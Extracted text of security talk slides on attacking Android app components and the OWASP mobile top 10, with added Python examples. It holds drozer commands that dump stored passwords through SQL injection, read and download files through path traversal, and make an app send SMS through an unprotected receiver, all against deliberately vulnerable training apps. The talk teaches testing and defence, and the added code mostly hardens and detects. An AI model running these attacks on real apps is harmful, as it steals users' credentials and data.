Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
• Unrestricted access to the app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  unrecognized token: ')' (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
  | Password         | pin  |
  | thisismypassword | 9876 |
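Why those two drozer probes behave as they do becomes obvious once the provider's query() is modelled. The following is an added example (not Sieve's source and not drozer code): a Python sqlite3 model of a Sieve-style provider that string-builds "SELECT <projection> FROM Passwords WHERE (<selection>)" from caller-controlled arguments, next to a hardened version that whitelists projection columns and only accepts bound "col = ?" selections. The table schema and rows are constructed stand-ins, not Sieve's real database.

```python
"""Model of the Sieve DBContentProvider.query() bug shown above, and a hardened
rewrite, on an in-memory SQLite database.

The vulnerable path concatenates the caller-supplied projection and selection
into SQL, which is why   --projection "* FROM Key--"   dumps the Key table and
--selection "'"   produces SQLite's 'unrecognized token' error.
"""
import re
import sqlite3

# Constructed data modelled on Sieve's two tables (not Sieve's real schema).
SCHEMA = """
CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password TEXT);
CREATE TABLE Key(Password TEXT, pin TEXT);
INSERT INTO Passwords VALUES (1, 'Gmail', 'alice', 'ENCRYPTED_BLOB_1');
INSERT INTO Passwords VALUES (2, 'Bank',  'alice', 'ENCRYPTED_BLOB_2');
INSERT INTO Key VALUES ('thisismypassword', '9876');
"""

PASSWORD_COLUMNS = {"_id", "service", "username", "password"}
# Only 'col = ?' terms joined by AND; literals, quotes and comments cannot get in.
_SIMPLE_SELECTION = re.compile(r"^\s*\w+\s*=\s*\?(?:\s+AND\s+\w+\s*=\s*\?)*\s*$", re.I)


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_query(conn, projection, selection, selection_args=()):
    """What the Sieve-style provider does: projection and selection arrive
    verbatim from the calling app (drozer here) and are pasted into the SQL."""
    cols = ", ".join(projection) if projection else "*"
    where = " WHERE (%s)" % selection if selection else ""
    sql = "SELECT %s FROM Passwords%s" % (cols, where)
    return conn.execute(sql, tuple(selection_args)).fetchall()


def hardened_query(conn, projection, selection, selection_args=()):
    """Whitelist projection columns and accept only parameterised selections.
    On Android the same effect comes from SQLiteQueryBuilder.setProjectionMap()
    plus setStrict(true) and passing selectionArgs through, never concatenating."""
    cols = list(projection) if projection else sorted(PASSWORD_COLUMNS)
    bad = [c for c in cols if c not in PASSWORD_COLUMNS]
    if bad:
        raise ValueError("unknown column(s): %r" % bad)
    where = ""
    if selection:
        if not _SIMPLE_SELECTION.match(selection):
            raise ValueError("selection must be 'col = ? [AND col = ?]...'")
        used = re.findall(r"(\w+)\s*=\s*\?", selection)
        if any(c not in PASSWORD_COLUMNS for c in used) or len(used) != len(selection_args):
            raise ValueError("bad selection columns or argument count")
        where = " WHERE (%s)" % selection
    sql = "SELECT %s FROM Passwords%s" % (", ".join(cols), where)
    return conn.execute(sql, tuple(selection_args)).fetchall()


def demo_injection(conn):
    """Reproduce the two drozer probes from the slide against the vulnerable path."""
    results = {}
    try:
        vulnerable_query(conn, None, "'")
    except sqlite3.OperationalError as e:
        results["probe"] = str(e)          # unbalanced quote: the injection oracle
    results["dump"] = vulnerable_query(conn, ["* FROM Key--"], None)  # reads Key instead
    return results


if __name__ == "__main__":
    db = open_db()
    print(demo_injection(db))
    print(hardened_query(db, ["service", "username"], "username = ?", ("alice",)))
```

The "--" in the projection turns the rest of the generated statement into a comment, so the provider happily runs SELECT * FROM Key; the hardened version rejects that projection before any SQL is built.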
Content providers attacks
• Path traversal
  One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
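The traversal works because the provider opens whatever path follows the authority. As an added example (not Sieve's FileBackupProvider and not drozer), the Python below models that openFile() behaviour next to a confined resolver that maps every request into one backup directory and rejects anything that canonicalises outside it. The backup directory location is an assumption (a path under the temp directory), since the slide does not say where Sieve keeps its backups.

```python
"""Model of the FileBackupProvider traversal shown above, next to a confined
resolver.

In Sieve the path part of the content URI is opened as a file system path
without any check, so content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
hands back /etc/hosts. The confined version treats the request as a name
inside one backup directory and refuses anything that escapes it.
"""
import os
import tempfile
from urllib.parse import unquote

# Constructed location; the real Sieve backup directory is not given on the slide.
BACKUP_DIR = os.path.join(tempfile.gettempdir(), "com.mwr.example.sieve", "backups")


def vulnerable_resolve(uri_path):
    """What Sieve does: Uri.getPath() is the file that gets opened."""
    return uri_path


def confined_resolve(backup_dir, uri_path):
    """Return the absolute path to open, or None if the request escapes backup_dir.

    Percent-decode first (Uri.getPath() already does this on Android, but a
    provider reading getEncodedPath() would not), treat the request as relative
    to backup_dir, canonicalise with realpath (follows symlinks, collapses ..),
    then check containment with commonpath rather than a string prefix so that
    '.../backups2' cannot pass as '.../backups'."""
    base = os.path.realpath(backup_dir)
    requested = unquote(uri_path).lstrip("/")
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def check(uri_path):
    """Side-by-side result for one content URI path."""
    return {
        "vulnerable": vulnerable_resolve(uri_path),
        "confined": confined_resolve(BACKUP_DIR, uri_path),
    }


if __name__ == "__main__":
    for p in ("/etc/hosts", "/../../etc/hosts", "/%2e%2e/databases/database.db",
              "/data/data/com.mwr.example.sieve/databases/database.db", "/2016-02-24.bak"):
        print("%-55s -> %s" % (p, check(p)))
```

Note that a plain "/etc/hosts" request is not rejected by the confined resolver; it simply maps to <backup_dir>/etc/hosts, which is the point: the caller names a backup, never a system file.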
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as battery low, boot completed, headset plugged in, etc. Most broadcasts originate from the system, but applications can also send their own.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.
Broadcast receivers attacks
Typical fail: missing authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the Intent and enjoy
Sample manifest from GoatDroid:
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
      <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action (GoatDroid's deliberately vulnerable code: whatever arrives in the Intent's extras is sent as an SMS, with no check on who sent the broadcast):
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      // phoneNumber and message come straight from the (unauthenticated) broadcast
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
Any app on the device (here drozer) can make FourGoats send an SMS, riding on FourGoats' own SEND_SMS permission:
  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all the above-mentioned components:
• Set the android:exported attribute to false: only code running under the same user ID as the app can then reach the component. Beware that a component declaring an <intent-filter> is exported by default unless you set this attribute explicitly.
• Limit access with a permission on the component (android:permission), either a custom permission (ideally with protectionLevel="signature") or a system one such as RECEIVE_SMS.
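The "enumerate receivers / find exported services" steps above all reduce to applying Android's export rules to the manifest. The following is an added example (not GoatDroid's or drozer's code): a Python analyzer that applies those rules to a decoded AndroidManifest.xml (as produced by apktool) and lists every component another app can reach, flagging the ones with no permission at all, which is the set drozer's "--permission null" filter shows. The sample manifest is constructed, modelled on the GoatDroid snippet above, with a hardened receiver and a permission-gated service added for contrast.

```python
"""Flag Android components reachable by other apps, from a decoded AndroidManifest.xml.

Export rules applied (as documented for the manifest):
  * android:exported="true"/"false" wins when present.
  * Otherwise an activity/service/receiver is exported iff it has an <intent-filter>.
  * Otherwise a <provider> is exported iff targetSdkVersion < 17.
An exported component with no android:permission is what the slides attack.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def _attr(elem, name):
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _is_exported(elem, target_sdk):
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return target_sdk < 17
    return elem.find("intent-filter") is not None


def exposed_components(manifest_xml):
    """Return [(tag, fully qualified name, permission or None)] for every component
    another app can reach, whether exported explicitly or by default."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    uses_sdk = root.find("uses-sdk")
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or 1) if uses_sdk is not None else 1
    app = root.find("application")
    found = []
    for elem in (app if app is not None else []):
        if elem.tag not in COMPONENT_TAGS or not _is_exported(elem, target_sdk):
            continue
        name = _attr(elem, "name") or ""
        if name.startswith("."):
            name = package + name            # relative class name
        elif "." not in name:
            name = package + "." + name
        found.append((elem.tag, name, _attr(elem, "permission")))
    return found


def unprotected(manifest_xml):
    """Exported components with no permission at all (drozer: --permission null)."""
    return [c for c in exposed_components(manifest_xml) if c[2] is None]


# Constructed sample, modelled on the GoatDroid FourGoats manifest quoted above.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.owasp.goatdroid.fourgoats">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="15" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application android:label="FourGoats">
    <activity android:name=".activities.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <!-- vulnerable: implicitly exported by its filter, no permission -->
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <!-- hardened variant: same kind of filter, but explicitly not exported -->
    <receiver android:name=".broadcastreceivers.InternalSmsReceiver" android:exported="false">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.INTERNAL_SMS" />
      </intent-filter>
    </receiver>
    <!-- exported on purpose, but gated by a custom permission -->
    <service android:name=".services.SyncService" android:exported="true"
             android:permission="org.owasp.goatdroid.fourgoats.permission.SYNC" />
    <!-- no exported attribute and targetSdkVersion 15: exported by default -->
    <provider android:name=".providers.NotesProvider"
              android:authorities="org.owasp.goatdroid.fourgoats.notes" />
  </application>
</manifest>
"""

if __name__ == "__main__":
    for tag, name, perm in exposed_components(SAMPLE_MANIFEST):
        print("%-9s %-72s permission=%s" % (tag, name, perm))
```

Run it on the output of "apktool d app.apk" and compare against "run app.package.attacksurface <package>" in drozer; the two lists should agree, and every unprotected entry deserves the receiver/provider probes shown above.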
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores (shared preferences)
  – Plain-text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing an application
• Analyze the package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (e.g. enforce device storage encryption with DevicePolicyManager.setStorageEncryption)
• For databases, consider SQLCipher for SQLite data encryption
• Ensure shared preferences are NOT created with MODE_WORLD_READABLE (or MODE_WORLD_WRITEABLE); use MODE_PRIVATE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known-weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done on the browser's side
• It is done through a "chain of trust"
• But how can a mobile app know it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate (or its public key) is embedded in the source code:
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Researchers from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check whether all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to FireEye research from July 17, 2014 on the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious decision to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks that cause data to leak
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
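Reading raw logcat by eye does not scale during a test, so the logcat step above is usually scripted. The following is an added example, not part of the original slides or of any tool they mention: a Python scanner for the default logcat "threadtime" format that flags lines carrying credentials, bearer tokens and JWTs, session cookies, or Luhn-valid card numbers, optionally limited to the PIDs of the app under test. The logcat excerpt is constructed (the FourGoats tag, PIDs and values are invented for the example), and the pattern list is a starting point to extend per app.

```python
"""Scan `adb logcat` output for data that should never have been logged.

Parses the default 'threadtime' line format
  MM-DD HH:MM:SS.mmm  PID  TID LEVEL TAG: message
and reports lines that carry credentials, bearer tokens / JWTs, session cookies
or Luhn-valid card numbers. Restricting to the PIDs of the app under test keeps
system noise out of the findings.
"""
import re

LOGCAT_LINE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>.+?)\s*:\s(?P<msg>.*)$")

PATTERNS = {
    "credential": re.compile(r"\b(?:password|passwd|pwd|pin)\s*[=:]\s*\S+", re.I),
    "bearer_token": re.compile(r"(?:Authorization:\s*Bearer|access_token=|token=)\s*[A-Za-z0-9._~+/=-]{16,}", re.I),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+"),
    "session_cookie": re.compile(r"\b(?:JSESSIONID|PHPSESSID|sessionid)=\w+", re.I),
    "card_number": re.compile(r"\b(?:\d[ -]?){13,19}\b"),
}


def luhn_ok(number):
    """Luhn checksum over the digits in `number` (spaces and dashes ignored)."""
    digits = [int(c) for c in number if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify(msg):
    """Set of pattern names that fire on one log message."""
    hits = set()
    for name, rx in PATTERNS.items():
        for m in rx.finditer(msg):
            if name == "card_number" and not luhn_ok(m.group(0)):
                continue  # long order / tracking numbers are not cards
            hits.add(name)
            break
    return hits


def scan_logcat(text, pids=None):
    """Return [{'pid', 'tag', 'msg', 'categories'}] for lines that leak sensitive data."""
    findings = []
    for line in text.splitlines():
        m = LOGCAT_LINE.match(line)
        if not m:
            continue
        if pids is not None and int(m.group("pid")) not in pids:
            continue
        cats = classify(m.group("msg"))
        if cats:
            findings.append({"pid": int(m.group("pid")), "tag": m.group("tag"),
                             "msg": m.group("msg"), "categories": sorted(cats)})
    return findings


# Constructed logcat excerpt (not a real capture); PID 4321 is the app under test.
SAMPLE_LOGCAT = """\
02-24 10:15:01.123  4321  4321 D FourGoats: login ok user=alice
02-24 10:15:01.130  4321  4321 D FourGoats: POST /login password=Winter2016!
02-24 10:15:02.002  4321  4350 I OkHttp  : Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.c2lnbmF0dXJl
02-24 10:15:03.500  4321  4321 V Payment : card 4111 1111 1111 1111 exp 12/19
02-24 10:15:03.700  1234  1234 I ActivityManager: Displayed org.owasp.goatdroid.fourgoats/.activities.Main: +350ms
02-24 10:15:04.100  4321  4321 D FourGoats: order id 1234567890123 shipped
02-24 10:15:05.000   987   987 W System.err: Set-Cookie: JSESSIONID=A1B2C3D4E5F6; Path=/
"""

if __name__ == "__main__":
    for hit in scan_logcat(SAMPLE_LOGCAT, pids={4321}):
        print(hit["tag"], hit["categories"], hit["msg"])
```

Feed it with "adb logcat -v threadtime -d > app.log" after exercising the app; the PID filter is worth keeping, because other processes (ActivityManager, System.err from a different app) produce their own noise and the finding you want to report is what your app's process wrote.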
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or elevate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by starting exported activities directly with drozer:
  dz> run app.activity.start --component <package_name> <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the password strength policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed: they must be enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store the user's password on the device. It should be optional and not enabled by default.
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or using a sound one in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfu​scation ≠ encryption
Broken Cryptography – how to find
• Decompile the APK using dex2jar (or Luyten for more verbose results) and review the JAR file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded in the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA-1, etc.)
Broken Cryptography - example
• An encrypted DB is definitely a good idea…
• …but not when you're hardcoding the password that decrypts it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption (a key derived from the user's passphrase) instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via Intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into a local DB
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX, a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" scheme allows remote installation of ANY application, while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Be careful with intent-filters: a component declaring an <intent-filter> is exported unless you set exported="false", and when your app sends an implicit Intent, another application can declare the same filter; the system then displays a dialog so the user picks which app handles it, and the Intent (with its extras) goes wherever they choose
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify whether the session expires (copy a cookie and try to use it after 30 minutes)
  – Verify whether the session is destroyed when the authentication state changes (e.g. switching from one logged-in user to another)
  – Verify whether you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as the session token)
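The guessability check above is easier with a small script once a handful of tokens has been captured in Burp. The following is an added example (not from the original slides): a Python triage that bounds the entropy of a token family from the alphabet and length actually observed, detects counter-style tokens, and checks whether a token is just a plain or hashed copy of a value the device hands to every app (Android ID, IMEI), which is exactly the device-ID-as-session-token failure the slide describes. The client values and token sets are constructed; the "random-like" tokens are SHA-256 digests of fixed strings standing in for server-side CSPRNG output so the example is reproducible.

```python
"""Triage of session tokens captured with an intercepting proxy (M9 checklist):
how much entropy does the token family really carry, is it a counter, and is a
token derived from something the device gives away (device ID, IMEI)?
"""
import hashlib
import math

MIN_BITS = 64  # practical floor for an unguessable session identifier


def alphabet_bits(tokens):
    """Upper bound on entropy: shortest token length times log2 of the alphabet
    actually observed across all tokens (a hex token cannot carry more than
    4 bits per character no matter how it was generated)."""
    alphabet = set("".join(tokens))
    shortest = min(len(t) for t in tokens)
    return shortest * math.log2(len(alphabet)) if len(alphabet) > 1 else 0.0


def looks_sequential(tokens, max_gap=10_000):
    """Decimal or hex tokens whose sorted values sit close together are counters."""
    if len(tokens) < 2:
        return False
    try:
        values = sorted(int(t) if t.isdigit() else int(t, 16) for t in tokens)
    except ValueError:
        return False
    gaps = [b - a for a, b in zip(values, values[1:])]
    return max(gaps) <= max_gap


def derived_from(token, client_values):
    """(value name, 'plain' | hash name) if the token is a client value or a bare
    hash of one; None otherwise."""
    t = token.lower()
    for name, value in client_values.items():
        if t == value.lower():
            return name, "plain"
        for algo in ("md5", "sha1", "sha256"):
            if t == hashlib.new(algo, value.encode()).hexdigest():
                return name, algo
    return None


def assess(tokens, client_values):
    """List of findings for a set of tokens issued to the same client."""
    findings = []
    bits = alphabet_bits(tokens)
    if bits < MIN_BITS:
        findings.append("low entropy: at most %.0f bits (floor %d)" % (bits, MIN_BITS))
    if looks_sequential(tokens):
        findings.append("sequential: tokens look like a counter")
    for tok in tokens:
        hit = derived_from(tok, client_values)
        if hit:
            findings.append("derived from %s (%s)" % hit)
    return findings


# Constructed test data: values any app on the device can read, and three token styles.
CLIENT = {"android_id": "9774d56d682e549c", "imei": "356938035643809"}
SEQUENTIAL = ["1000234", "1000235", "1000236"]
DEVICE_BOUND = [hashlib.md5(CLIENT["android_id"].encode()).hexdigest()]
# stand-ins for server-side CSPRNG output (fixed digests so the run is reproducible)
RANDOM_LIKE = [hashlib.sha256(("sample-%d" % i).encode()).hexdigest() for i in range(5)]

if __name__ == "__main__":
    for label, toks in (("sequential", SEQUENTIAL), ("device-bound", DEVICE_BOUND), ("random-like", RANDOM_LIKE)):
        print(label, assess(toks, CLIENT) or ["no findings"])
```

The alphabet bound is deliberately optimistic; a token family that fails even this bound, or that matches a hash of the Android ID, needs no further statistical analysis before it goes into the report.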
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
